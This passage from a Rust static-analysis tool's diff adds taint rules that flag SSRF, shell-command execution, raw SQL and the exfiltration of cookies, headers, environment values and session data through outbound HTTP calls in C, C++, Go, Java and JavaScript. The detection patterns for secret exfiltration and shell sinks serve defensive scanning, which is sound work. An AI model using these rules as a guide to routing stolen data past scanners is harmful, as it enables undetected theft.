=> 2, SourceKind::Unknown | SourceKind::FileSystem => 1, SourceKind::Database | SourceKind::CaughtException => 0, @@ -538,6 +612,8 @@ pub fn generate_explanation(diag: &Diag) -> Option { use crate::labels::SourceKind; match kind { SourceKind::UserInput => "user input", + SourceKind::Cookie => "cookie", + SourceKind::Header => "request header", SourceKind::EnvironmentConfig => "environment/config", SourceKind::Database => "database", SourceKind::FileSystem => "file system", diff --git a/src/labels/c.rs b/src/labels/c.rs index c38010aa..31222bf2 100644 --- a/src/labels/c.rs +++ b/src/labels/c.rs @@ -1,4 +1,4 @@ -use crate::labels::{Cap, DataLabel, Kind, LabelRule, ParamConfig}; +use crate::labels::{Cap, DataLabel, GateActivation, Kind, LabelRule, ParamConfig, SinkGate}; use phf::{Map, phf_map}; pub static RULES: &[LabelRule] = &[ @@ -69,6 +69,33 @@ pub static RULES: &[LabelRule] = &[ }, ]; +/// Gated sinks for C. +/// +/// `curl_easy_setopt(handle, option, payload)` is libcurl's option-binding +/// interface; the option identifier at arg 1 selects which slot the payload +/// fills. `CURLOPT_POSTFIELDS` and `CURLOPT_COPYPOSTFIELDS` carry the +/// request body, while other CURLOPT_* constants designate URL / auth / TLS +/// behaviour and are not DATA_EXFIL-relevant. Gating on the macro identifier +/// keeps the rule from over-firing on `curl_easy_setopt(h, CURLOPT_URL, url)` +/// (covered separately by the `curl_easy_perform` SSRF flat sink). +/// +/// Identifier-based activation is enabled via the macro-arg fallback in +/// `cfg::mod::classify_gated_sink` for `lang == "c"`. Header-parsing +/// libraries (e.g. libmicrohttpd, mongoose) lack a stable surface and are +/// left to project-specific config. +pub static GATED_SINKS: &[SinkGate] = &[SinkGate { + callee_matcher: "curl_easy_setopt", + arg_index: 1, + dangerous_values: &["CURLOPT_POSTFIELDS", "CURLOPT_COPYPOSTFIELDS"], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: true, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::ValueMatch, +}]; + pub static KINDS: Map<&'static str, Kind> = phf_map! { // control-flow "if_statement" => Kind::If, diff --git a/src/labels/cpp.rs b/src/labels/cpp.rs index 1587ad92..43ee9119 100644 --- a/src/labels/cpp.rs +++ b/src/labels/cpp.rs @@ -1,4 +1,4 @@ -use crate::labels::{Cap, DataLabel, Kind, LabelRule, ParamConfig}; +use crate::labels::{Cap, DataLabel, GateActivation, Kind, LabelRule, ParamConfig, SinkGate}; use phf::{Map, phf_map}; pub static RULES: &[LabelRule] = &[ @@ -91,6 +91,28 @@ pub static RULES: &[LabelRule] = &[ }, ]; +/// Gated sinks for C++. +/// +/// Mirror of the C gate set: `curl_easy_setopt` with `CURLOPT_POSTFIELDS` / +/// `CURLOPT_COPYPOSTFIELDS` at arg 1 binds the request body at arg 2. +/// Identifier-based activation is enabled via the macro-arg fallback in +/// `cfg::mod::classify_gated_sink` for `lang == "cpp" / "c++"`. Modern C++ +/// HTTP wrappers (cpr, Boost.Beast) layer over libcurl or directly over the +/// socket; their ergonomic surfaces differ enough that adding gates per- +/// library is left for a follow-up driven by the corpus. +pub static GATED_SINKS: &[SinkGate] = &[SinkGate { + callee_matcher: "curl_easy_setopt", + arg_index: 1, + dangerous_values: &["CURLOPT_POSTFIELDS", "CURLOPT_COPYPOSTFIELDS"], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: true, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::ValueMatch, +}]; + pub static KINDS: Map<&'static str, Kind> = phf_map! { // control-flow "if_statement" => Kind::If, diff --git a/src/labels/go.rs b/src/labels/go.rs index ae4f6dca..0ad247ad 100644 --- a/src/labels/go.rs +++ b/src/labels/go.rs @@ -1,11 +1,13 @@ -use crate::labels::{Cap, DataLabel, Kind, LabelRule, ParamConfig, RuntimeLabelRule}; +use crate::labels::{ + Cap, DataLabel, GateActivation, Kind, LabelRule, ParamConfig, RuntimeLabelRule, SinkGate, +}; use crate::utils::project::{DetectedFramework, FrameworkContext}; use phf::{Map, phf_map}; pub static RULES: &[LabelRule] = &[ // ─────────── Sources ─────────── LabelRule { - matchers: &["os.Getenv"], + matchers: &["os.Getenv", "os.LookupEnv", "os.Environ"], label: DataLabel::Source(Cap::all()), case_sensitive: false, }, @@ -16,8 +18,12 @@ pub static RULES: &[LabelRule] = &[ "r.URL", "r.Body", "r.Header", + "r.Header.Get", + "r.Header.Values", "r.URL.Query", "r.URL.Query.Get", + "r.Cookie", + "r.Cookies", "Request.FormValue", "Request.URL", ], @@ -97,27 +103,20 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::HTML_ESCAPE), case_sensitive: false, }, + // ── Outbound HTTP clients (SSRF) ─────────────────────────────────── + // + // These are modeled as destination-aware gated sinks in `GATED_SINKS` + // below. Flat Sink rules would over-flag every positional argument as + // SSRF (so a tainted body in `http.Post(url, contentType, body)` would + // fire SSRF on the body), and the gate machinery short-circuits when a + // flat Sink label is already attached to the callee, blocking DATA_EXFIL + // body-flow gates from running. + // + // `net.Dial` / `net.DialTimeout` keep their flat-sink modeling: the + // first positional arg is the network address with no body / payload + // companion, so the over-flag concern does not apply. LabelRule { - matchers: &[ - "http.Get", - "http.Post", - "http.Head", - "http.NewRequest", - "http.NewRequestWithContext", - "net.Dial", - "net.DialTimeout", - // `http.DefaultClient` is the package-level default `*http.Client`. - // Idiomatic Go SSRF sinks (Owncast CVE-2023-3188) use the - // `http.DefaultClient.Get(url)` form rather than the bare - // `http.Get(url)` helper, so the suffix-matched callee text needs - // an explicit entry here, bare `Get/Post/Do/Head` would - // over-match unrelated method names. - "http.DefaultClient.Get", - "http.DefaultClient.Post", - "http.DefaultClient.Head", - "http.DefaultClient.Do", - "http.DefaultClient.PostForm", - ], + matchers: &["net.Dial", "net.DialTimeout"], label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, @@ -135,6 +134,343 @@ pub static RULES: &[LabelRule] = &[ }, ]; +/// Argument-role-aware Go sinks. Two classes coexist on the outbound HTTP +/// surface, mirroring the JS/TS modeling: +/// +/// * SSRF on the URL-bearing position of a one-shot request (`http.Get`, +/// `http.Post`, `http.NewRequest`, `http.DefaultClient.*`). +/// * `Cap::DATA_EXFIL` on the body / payload position when the source is +/// Sensitive (cookies, headers, env, db reads). Gates fire only when +/// taint reaches the body argument, so a tainted URL alone never +/// activates DATA_EXFIL and a tainted body alone never activates SSRF. +/// +/// `http.NewRequest` / `http.NewRequestWithContext` carry an SSRF gate on +/// their URL position only. In Go's two-step idiom the actual network +/// call happens at `client.Do(req)`; body taint flows from the body +/// argument through the returned `*http.Request` via default arg → return +/// propagation, and then activates the `http.DefaultClient.Do` DATA_EXFIL +/// gate below. Modeling NewRequest as a body propagator (rather than a +/// body sink) avoids duplicate findings on the idiomatic +/// `req, _ := http.NewRequest(...); client.Do(req)` shape. +pub static GATED_SINKS: &[SinkGate] = &[ + // ── SSRF gates (URL-bearing position) ──────────────────────────────── + // `http.Get(url)` — url is arg 0. + SinkGate { + callee_matcher: "http.Get", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.Head(url)` — url is arg 0. + SinkGate { + callee_matcher: "http.Head", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.Post(url, contentType, body)` — url is arg 0. + SinkGate { + callee_matcher: "http.Post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.PostForm(url, data)` — url is arg 0. + SinkGate { + callee_matcher: "http.PostForm", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.NewRequest(method, url, body)` — url is arg 1. + SinkGate { + callee_matcher: "http.NewRequest", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.NewRequestWithContext(ctx, method, url, body)` — url is arg 2. + SinkGate { + callee_matcher: "http.NewRequestWithContext", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.Get(url)` / `.Head(url)` — url is arg 0. + SinkGate { + callee_matcher: "http.DefaultClient.Get", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "http.DefaultClient.Head", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.Post(url, contentType, body)` — url is arg 0. + SinkGate { + callee_matcher: "http.DefaultClient.Post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.PostForm(url, data)` — url is arg 0. + SinkGate { + callee_matcher: "http.DefaultClient.PostForm", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // ── DATA_EXFIL gates (body-bearing position) ───────────────────────── + // `http.Post(url, contentType, body)` — body is arg 2. + SinkGate { + callee_matcher: "http.Post", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.PostForm(url, data)` — `data` (arg 1) is `url.Values`. Form + // bodies serialize the same operator state cookies / headers do, so a + // tainted Sensitive value reaching the form payload is DATA_EXFIL. + SinkGate { + callee_matcher: "http.PostForm", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.Do(req)` — `req` (arg 0) is the `*http.Request` + // value. Body taint introduced via either `http.NewRequest(_, _, body)` + // (default arg → return propagation) or a later `req.Body = body` field + // write reaches this sink through the request value. + SinkGate { + callee_matcher: "http.DefaultClient.Do", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.PostForm(url, data)` — same as `http.PostForm` + // but invoked through the package-level default `*http.Client`. + SinkGate { + callee_matcher: "http.DefaultClient.PostForm", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `http.DefaultClient.Post(url, contentType, body)` — body is arg 2. + SinkGate { + callee_matcher: "http.DefaultClient.Post", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // ── Common third-party HTTP clients ───────────────────────────────── + // + // `go-resty/resty`: `client.R().SetBody(body).Post(url)` style. + // `SetBody(body)` carries the body into the chained request; the + // network call happens at the verb method. We model the verb + // methods (Get / Post / Put / Patch / Delete / Send / Execute) as + // DATA_EXFIL gates with `payload_args: &[]` (empty), which engages + // the receiver-tainted fallback in `collect_tainted_sink_vars`. A + // builder receiver carrying body taint from `SetBody` activates the + // sink without us needing a positional body arg. + SinkGate { + callee_matcher: "resty.Request.Post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "resty.Request.Put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "resty.Request.Patch", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // `imroc/req`: `req.Post(url, req.BodyJSON(payload))`, the `BodyJSON` + // / `BodyXML` helpers wrap a tainted payload and pass it as arg 1+ of + // the verb call. Since the helper return value carries the body + // taint, gating the verb on every payload arg is sufficient. + SinkGate { + callee_matcher: "req.Post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1, 2, 3], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "req.Put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1, 2, 3], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, +]; + pub static KINDS: Map<&'static str, Kind> = phf_map! { // control-flow "if_statement" => Kind::If, diff --git a/src/labels/java.rs b/src/labels/java.rs index 8c04e9f6..2d5d57c8 100644 --- a/src/labels/java.rs +++ b/src/labels/java.rs @@ -31,6 +31,15 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Source(Cap::all()), case_sensitive: false, }, + // Sensitive operator state: HTTP session attributes commonly carry + // auth tokens / CSRF tokens / signed user ids. Routed through the + // `Cookie` source-kind heuristic so DATA_EXFIL fires when these + // values leave the process via an outbound request body. + LabelRule { + matchers: &["HttpSession.getAttribute", "session.getAttribute"], + label: DataLabel::Source(Cap::all()), + case_sensitive: false, + }, // ───────── Sanitizers ────────── LabelRule { matchers: &["HtmlUtils.htmlEscape", "StringEscapeUtils.escapeHtml4"], @@ -121,6 +130,79 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, + // ── Cross-boundary data exfiltration ────────────────────────────────── + // + // Outbound HTTP egress points where a Sensitive source (cookie, header, + // env, session attribute, db read) reaching the request body / payload + // is a cross-boundary disclosure distinct from SSRF. The flat-rule + // model relies on default arg → return propagation through builder + // chains: `HttpRequest.newBuilder().uri(u).POST(BodyPublishers.ofString(p)).build()` + // smears `p`-taint into the returned request, which then activates the + // sink at `client.send(req)`. + // + // Type-qualified resolution maps `restTemplate.postForObject(...)` → + // `HttpClient.postForObject` via the JAVA_HIERARCHY (RestTemplate, + // OkHttpClient, WebClient, CloseableHttpClient all subtype HttpClient), + // so a single set of `HttpClient.` rules covers every framework + // in scope. Plain user input is silenced by the source-sensitivity + // gate in `effective_sink_caps`, so this fires only on cookies / headers + // / env / session / db. + LabelRule { + matchers: &[ + // java.net.http: client.send(req) consumes a request that + // carries body-taint via BodyPublishers.ofString/ofByteArray/ + // ofInputStream through the builder chain. + "HttpClient.send", + "HttpClient.sendAsync", + // Spring RestTemplate verbs that take a body / entity. + "postForObject", + "postForEntity", + "RestTemplate.exchange", + "RestTemplate.put", + "RestTemplate.patchForObject", + // Apache HttpClient: httpClient.execute(req) where req is an + // HttpPost / HttpPut / HttpPatch with .setEntity(StringEntity(p)). + // CloseableHttpClient subtypes HttpClient so type-qualified + // resolution rewrites client.execute → HttpClient.execute. + "HttpClient.execute", + // Spring WebClient body-binding step: + // webClient.post().uri(u).bodyValue(payload).retrieve(). + // bodyValue is the explicit body-bind verb; default propagation + // carries the tainted body into the chain return so the sink + // attaches at the body-bind site itself (no cross-call needed). + "bodyValue", + // Apache HttpClient body-binding: the `setEntity` step on + // HttpPost / HttpPut / HttpPatch mutates the request rather + // than returning the builder, so the receiver's SSA value at + // the later `httpClient.execute(req)` does not carry body + // taint via the default smear (which threads through return + // values, not field mutations). Firing DATA_EXFIL at the + // setEntity call itself catches the body-binding directly. + // The matcher is specific enough to avoid collisions — + // `setEntity` is Apache-HttpClient-specific. + "setEntity", + // OkHttp builder body-binding shortcut: when the chain + // doesn't roll through `.post(body).build()` (e.g. a helper + // function returns the Builder mid-chain), `RequestBody` + // is bound via `.post(body)` / `.put(body)` / `.patch(body)` + // / `.delete(body)` directly on the Builder. These methods + // also exist on unrelated classes (NIO, Streams) but in the + // OkHttp idiom the receiver type is `Request.Builder`; the + // receiver-type widening from `Request.Builder` → HttpClient + // isn't currently modeled, so we fall back to suffix-name + // matchers and accept some receiver-agnostic firing risk. + // Conservative: omit these for v1 to avoid over-fire on + // non-OkHttp `post`/`put`/`patch` calls. + // OkHttp two-step: client.newCall(req).execute() / .enqueue(). + // Chain normalization strips `()` between dots so the tree- + // sitter callee text `client.newCall(req).execute` matches the + // suffix `newCall.execute` after normalization. + "newCall.execute", + "newCall.enqueue", + ], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + }, LabelRule { matchers: &[ "readObject", diff --git a/src/labels/javascript.rs b/src/labels/javascript.rs index 2ebace19..0c8d7367 100644 --- a/src/labels/javascript.rs +++ b/src/labels/javascript.rs @@ -98,6 +98,26 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sanitizer(Cap::HTML_ESCAPE), case_sensitive: false, }, + // Conventional forwarding wrappers, telemetry / analytics / metrics dispatch. + // Treating these as Sanitizer(DATA_EXFIL) encodes the project convention + // that a payload routed through a named forwarding boundary is an + // explicit, expected egress (the developer named the function), not the + // accidental cross-boundary leak DATA_EXFIL is meant to catch. Users who + // do not follow this convention can override per-project via + // [analysis.languages.javascript] custom rules; the convention is + // documented in docs/detectors/taint.md so projects can extend it. + LabelRule { + matchers: &[ + "serializeForUpstream", + "forwardPayload", + "tracker.send", + "analytics.track", + "metrics.report", + "logEvent", + ], + label: DataLabel::Sanitizer(Cap::DATA_EXFIL), + case_sensitive: false, + }, // Conventional project-local HTML escapers. Suffix word-boundary match // fires on bare calls to locally defined helpers (`function escapeHtml(x)` // invoked as `escapeHtml(x)`) across codebases that follow the common @@ -128,6 +148,23 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::URL_ENCODE), case_sensitive: false, }, + // Shell-exec sinks. Qualified `child_process.*` and bare destructured- + // import forms (`exec`, `execSync`, `execFile`, ...) are both modeled as + // flat sinks here so module-aliased call sites like `cp.exec(...)` + // (where `cp = require('child_process')`) still fire via suffix match. + // The bare-form FPs that motivated tightening are addressed elsewhere: + // + // * `container.exec(...)` (Dockerode) and `exec.start(...)` (the + // resulting `exec` handle) — `container.exec` is excluded via the + // EXCLUDES list below; `exec.start` is suppressed by restricting + // `first_member_label`'s suffix-strip-and-retry to `Source` labels + // only (see `cfg/helpers.rs`). + // * `execSync(cmd, { env: process.env })` flagging `process.env` + // flowing into the options arg — addressed by the + // `=exec`/`=execSync`/`=execFile`/... gates in `GATED_SINKS` below + // which set `payload_args: &[0]`. The cfg pass propagates a gate's + // payload_args restriction onto the matching flat sink so only arg + // 0 (the command string) is taint-checked at the call site. LabelRule { matchers: &[ "child_process.exec", @@ -136,8 +173,9 @@ pub static RULES: &[LabelRule] = &[ "child_process.execFile", // Bare forms from destructured imports: // const { exec, execSync } = require('child_process') - // Note: bare `exec` suffix-matches RegExp.prototype.exec() too, - // but in practice tainted data rarely flows to regexp.exec(). + // and module-aliased calls like `cp.exec(...)`. Receiver-name + // collisions (`container.exec`, etc.) are suppressed via + // EXCLUDES; arg-position restriction comes from the `=*` gates. "exec", "execSync", "execFile", @@ -250,16 +288,22 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SQL_QUERY), case_sensitive: false, }, - // ORM / query builder raw-SQL entry points + // ORM / query builder raw-SQL entry points. + // + // `$queryRaw` / `$executeRaw` are tagged-template forms; the SQL is + // assembled from a template literal so taint reaching arg 0 is the + // injection vector and modeling them as flat sinks is correct. + // + // `$queryRawUnsafe` / `$executeRawUnsafe` accept positional bind + // parameters: `tx.$queryRawUnsafe(sqlTemplate, p1, p2, ...)` binds + // p1..pN as `$1..$N` (PostgreSQL prepared-statement params) and the SQL + // template at arg 0 is the only injection point. These are modeled as + // gated sinks below (`payload_args: &[0]`) so taint flowing only into + // the bind params no longer fires. `sequelize.query` and `knex.raw` + // also accept a separate bind-params object/array but the bind-params + // interface is non-positional in those APIs, so they stay flat for now. LabelRule { - matchers: &[ - "sequelize.query", - "knex.raw", - "$queryRaw", - "$queryRawUnsafe", - "$executeRaw", - "$executeRawUnsafe", - ], + matchers: &["sequelize.query", "knex.raw", "$queryRaw", "$executeRaw"], label: DataLabel::Sink(Cap::SQL_QUERY), case_sensitive: true, }, @@ -295,6 +339,17 @@ pub static EXCLUDES: &[&str] = &[ "req.session.regenerate", "req.session.save", "req.session.reload", + // Dockerode container API: `container.exec({ Cmd: [...] })` is the + // canonical non-shell exec path (the Cmd array is passed directly to + // the kernel via `execve`, no shell parsing). `exec.start(...)` is + // the follow-on stream attach. Suffix-matching the bare `exec` rule + // would otherwise classify every `.exec(...)` method call + // — including these — as a SHELL_ESCAPE sink. These patterns name + // the Dockerode SDK methods specifically; if a project happens to + // also expose its own `container.exec` shell wrapper, override via + // [analysis.languages.javascript] custom rules. + "container.exec", + "exec.start", ]; pub static GATED_SINKS: &[SinkGate] = &[ @@ -577,6 +632,128 @@ pub static GATED_SINKS: &[SinkGate] = &[ object_destination_fields: &["body", "headers", "json"], }, }, + // ── Shell-exec sinks (SHELL_ESCAPE) ────────────────────────────────── + // + // Only arg 0 (the command string) is a shell-injection payload. + // `options.env` / `options.cwd` / etc. at arg 1+ are not. Bare forms + // (`exec`, `execSync`, `execFile`, `execAsync`, `execPromise`) use the + // `=` exact-only sigil so they match the destructured-import shape + // (`const { exec } = require('child_process'); exec(cmd)`) without + // colliding with any `.exec` method (Dockerode's + // `container.exec`, `RegExp.prototype.exec`, etc.). + // Qualified `child_process.*` forms stay as flat sinks (see RULES above); + // gates run only when no flat sink already classifies the call, so adding + // them here would never fire. The bare destructured-import forms below + // are the only place where shell-exec needs gating, since `classify_all` + // can't safely register a bare `exec` rule without colliding with every + // `.exec` method (Dockerode `container.exec`, + // `RegExp.prototype.exec`, etc.). + SinkGate { + callee_matcher: "=exec", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execSync", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execFile", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execAsync", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "=execPromise", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SHELL_ESCAPE), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + // ── Prisma raw-SQL with positional bind params (SQL_QUERY) ─────────── + // + // `tx.$queryRawUnsafe(sqlTemplate, p1, p2, ...)` binds `p1..pN` as + // PostgreSQL `$1..$N` prepared-statement parameters; only arg 0 (the + // SQL template) is the injection vector. Flat sinks here flagged taint + // flowing only into bind params, which is equivalent to a parameterised + // query and not exploitable. Suffix-match (no `=` sigil) so + // `tx.$queryRawUnsafe`, `prisma.$queryRawUnsafe`, etc. all qualify. + SinkGate { + callee_matcher: "$queryRawUnsafe", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SQL_QUERY), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "$executeRawUnsafe", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SQL_QUERY), + case_sensitive: true, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, ]; pub static KINDS: Map<&'static str, Kind> = phf_map! { diff --git a/src/labels/mod.rs b/src/labels/mod.rs index 248d0695..39d7b877 100644 --- a/src/labels/mod.rs +++ b/src/labels/mod.rs @@ -320,6 +320,11 @@ static GATED_REGISTRY: Lazy> = Lazy:: m.insert("ts", typescript::GATED_SINKS); m.insert("python", python::GATED_SINKS); m.insert("py", python::GATED_SINKS); + m.insert("go", go::GATED_SINKS); + m.insert("php", php::GATED_SINKS); + m.insert("c", c::GATED_SINKS); + m.insert("cpp", cpp::GATED_SINKS); + m.insert("c++", cpp::GATED_SINKS); m }); @@ -473,6 +478,10 @@ pub fn lookup(lang: &str, raw: &str) -> Kind { pub enum SourceKind { /// Direct user input (request params, argv, stdin, form data) UserInput, + /// HTTP cookie value (carries session / auth material) + Cookie, + /// HTTP request header (may carry auth tokens, user-agent fingerprints) + Header, /// Environment variables and configuration EnvironmentConfig, /// File system reads @@ -485,10 +494,81 @@ pub enum SourceKind { Unknown, } +/// Sensitivity classification of a taint source. Drives detector classes +/// like `DATA_EXFIL` that only fire when the source carries information +/// the operator did not intend to leak. Plain user input echoed back into +/// an outbound request is not data exfiltration, the user already controls +/// it, surfacing it as a leak is noise. +/// +/// The threshold for `DATA_EXFIL` is `>= Sensitive`, plain user input is +/// suppressed. Projects that legitimately classify a request body as +/// sensitive (e.g. an API gateway forwarding pre-authenticated user tokens +/// out of a request body) can override via custom rules in `nyx.conf`, +/// either by re-classifying the source or by adding a Sanitizer rule for +/// `Cap::DATA_EXFIL` on the legitimate forwarding path. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord)] +pub enum Sensitivity { + /// Attacker-controlled but not secret in itself, request bodies, query + /// strings, form fields, argv. Echoing this to an outbound request is + /// not data exfiltration. + Plain, + /// Carries operator state the user should not see leak out, cookies, + /// auth headers, env, file system reads, database rows. + Sensitive, + /// Reserved for future explicit secret classifications (API keys, + /// credential stores, key material). No source currently produces + /// this, but the threshold check in `effective_sink_caps` already + /// handles it monotonically. + Secret, +} + +impl SourceKind { + /// Return the sensitivity tier this source kind belongs to. Drives the + /// `Cap::DATA_EXFIL` cap-suppression decision in `ast.rs`. + pub fn sensitivity(self) -> Sensitivity { + match self { + // Plain user-controlled input, the user already has the data, + // surfacing it back to them via an outbound request is not a + // disclosure. + SourceKind::UserInput => Sensitivity::Plain, + // Operator-bound state, leaking these via an outbound request + // is a real cross-boundary disclosure. + SourceKind::Cookie + | SourceKind::Header + | SourceKind::EnvironmentConfig + | SourceKind::FileSystem + | SourceKind::Database => Sensitivity::Sensitive, + // Caught exceptions can carry stack traces, db errors, internal + // paths, treat them as sensitive by default. + SourceKind::CaughtException => Sensitivity::Sensitive, + // Conservative default for unclassified sources, surface + // findings rather than silently drop them. + 